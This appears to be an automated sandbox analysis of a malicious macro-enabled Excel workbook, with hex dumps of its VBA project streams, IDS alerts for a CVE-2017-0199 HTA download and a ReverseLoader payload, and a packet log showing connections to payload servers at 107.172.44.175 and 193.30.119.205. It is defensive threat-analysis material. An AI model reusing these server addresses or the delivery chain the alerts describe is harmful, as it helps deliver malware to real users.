                                                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . g O . u Z o . . A B . ( ) < p L . . z . " . . . . . . . . . . . . . \\ . p . N o . f Q y i p $ m . g z R . , E m m } { - g . . R . . f . . _ N z w . - . ' w 0 9 h 6 n n ; z . c 3 < 0 . ! 4 . . . A ! . B . . . % & a . . . . z . . . = . . . ; 8 Y y . . . . l t B q * ^ Z . . . . . . . . . . . . . v . . . . . . . . . . . 7 B = . . . I . I . L . ( Z . @ . . . J 9 . . . _ " . . . . . . . [ . . . . v n . . . < 1 . . . 8 t 5 ' s M ` X . $ . F , - { ~ . 1 . . .
                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 93 96 d2 c3 d8 95 67 a0 8d 4f e8 0a 75 c0 5a 6f 89 fe c4 7f e8 dd 03 cd e5 a1 41 ac 42 14 28 81 29 3c f4 70 4c 98 0f da 03 b4 ea f7 7a fb 15 22 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 eb b0 e2 00 00 00 5c 00 70 00 a4 86 4e 6f 11 66 51 79 69 70 24 6d 09 67 d8 f9 7a 52 05 2c 84 bd 45 dd f9 6d
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                            CLSID:
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Stream Size:529
                                                            Entropy:5.2827899145053
                                                            Base64 Encoded:True
                                                            Data ASCII:I D = " { 5 1 5 8 A 5 1 6 - 7 D B 5 - 4 E B 4 - A C 4 8 - 6 F 0 F 9 2 7 8 2 9 6 5 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 4 0 6 C B 7 D D B 2 1 D F 2 1 D
                                                            Data Raw:49 44 3d 22 7b 35 31 35 38 41 35 31 36 2d 37 44 42 35 2d 34 45 42 34 2d 41 43 34 38 2d 36 46 30 46 39 32 37 38 32 39 36 35 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:104
                                                            Entropy:3.0488640812019017
                                                            Base64 Encoded:False
                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:2644
                                                            Entropy:3.978657076361297
                                                            Base64 Encoded:False
                                                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:553
                                                            Entropy:6.384815373546849
                                                            Base64 Encoded:True
                                                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . W i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                                            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 fe ce 57 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-26T15:48:58.373937+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1107.172.44.17580192.168.2.2249169TCP
                                                            2024-11-26T15:48:58.373937+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1107.172.44.17580192.168.2.2249169TCP
                                                            2024-11-26T15:49:02.095969+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164107.172.44.17580TCP
                                                            2024-11-26T15:49:02.095986+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1107.172.44.17580192.168.2.2249164TCP
                                                            2024-11-26T15:49:07.144771+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166107.172.44.17580TCP
                                                            2024-11-26T15:49:07.144795+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1107.172.44.17580192.168.2.2249166TCP
                                                            2024-11-26T15:49:16.286145+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249167107.172.44.17580TCP
                                                            2024-11-26T15:49:29.759254+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21193.30.119.205443192.168.2.2249168TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 26, 2024 15:48:58.642220020 CET49163443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:48:58.642251968 CET44349163152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:48:58.642318964 CET49163443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:48:58.648458004 CET49163443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:48:58.648468971 CET44349163152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:00.213419914 CET44349163152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:00.213556051 CET49163443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:00.218807936 CET49163443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:00.218818903 CET44349163152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:00.219165087 CET44349163152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:00.219212055 CET49163443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:00.293361902 CET49163443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:00.339335918 CET44349163152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:00.823208094 CET44349163152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:00.823307991 CET44349163152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:00.823329926 CET49163443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:00.823355913 CET49163443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:00.827800035 CET49163443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:00.827821016 CET44349163152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:00.835239887 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:00.955991983 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:00.956135035 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:00.956290960 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:01.077769041 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.095856905 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.095968962 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.095985889 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.096003056 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.096024036 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.096046925 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.096559048 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.096571922 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.096585035 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.096609116 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.096623898 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.097279072 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.097295046 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.097309113 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.097322941 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.097327948 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.097348928 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.097364902 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.101995945 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.216317892 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.216342926 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.216470003 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.220401049 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.220479965 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.288022041 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.288094044 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.288106918 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.288151026 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.291932106 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.292007923 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.293505907 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.293550968 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.293572903 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.293592930 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.302284002 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.302301884 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.302386999 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.310678005 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.310769081 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.311193943 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.311250925 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.319139004 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.319150925 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.319225073 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.327498913 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.327542067 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.327613115 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.327660084 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.336095095 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.336143017 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.336220980 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.336287022 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.344631910 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.344703913 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.344845057 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.344891071 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.353154898 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.353224039 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.353247881 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.353341103 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.360734940 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.360846043 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.360917091 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.360992908 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.368566036 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.368578911 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.368645906 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.408118963 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.408188105 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.479731083 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.479801893 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.479849100 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.479892015 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.481879950 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.481955051 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.481990099 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.482090950 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.486835957 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.486912012 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.488765001 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.488848925 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.488934040 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.488985062 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.494051933 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.494146109 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.494268894 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.494318008 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.499785900 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.499845982 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.499880075 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.499927044 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.505276918 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.505363941 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.505373001 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.505415916 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.509557962 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.509612083 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.509706020 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.509783030 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.513756037 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.513813019 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.513843060 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.513891935 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.517859936 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.517920971 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.517987013 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.518045902 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.522562981 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.522638083 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.522677898 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.522716999 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.527280092 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.527293921 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.527358055 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.531922102 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.532021046 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.532075882 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.532157898 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.536550045 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.536611080 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.536664963 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.536709070 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.541254044 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.541354895 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.541449070 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.541501045 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.545964956 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.546089888 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.546123981 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.546188116 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.549782991 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.549866915 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.549957037 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:02.550086975 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.918819904 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:02.918883085 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:03.040153980 CET8049164107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:03.040257931 CET4916480192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:03.690552950 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:03.690649033 CET44349165152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:03.690738916 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:03.721745968 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:03.721771955 CET44349165152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:05.270597935 CET44349165152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:05.270713091 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:05.275681019 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:05.275707006 CET44349165152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:05.275995970 CET44349165152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:05.278568029 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:05.358171940 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:05.403331995 CET44349165152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:05.885196924 CET44349165152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:05.885250092 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:05.885277033 CET44349165152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:05.885293007 CET44349165152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:05.885312080 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:05.885328054 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:05.887164116 CET49165443192.168.2.22152.231.102.107
                                                            Nov 26, 2024 15:49:05.887181997 CET44349165152.231.102.107192.168.2.22
                                                            Nov 26, 2024 15:49:05.906512976 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:06.027859926 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:06.027924061 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:06.028186083 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:06.148168087 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.144638062 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.144771099 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.144794941 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.144809008 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.144861937 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.144861937 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.145272970 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.145329952 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.145574093 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.145586014 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.145627022 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.145627022 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.146167040 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.146217108 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.146220922 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.146229029 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.146305084 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.147032022 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.147094011 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.198201895 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.265093088 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.265199900 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.265283108 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.265331984 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.269047022 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.269097090 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.336766958 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.336785078 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.336910009 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.340713024 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.340876102 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.340967894 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.349248886 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.349392891 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.349572897 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.357587099 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.357635975 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.357692957 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.357774973 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.365914106 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.365962982 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.366067886 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.366108894 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.374353886 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.374404907 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.374569893 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.374692917 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.382725954 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.382793903 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.382891893 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.382936001 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.392112017 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.392127037 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.392177105 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.400121927 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.400136948 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.400172949 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:07.408111095 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.408124924 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:07.408159971 CET4916680192.168.2.22107.172.44.175
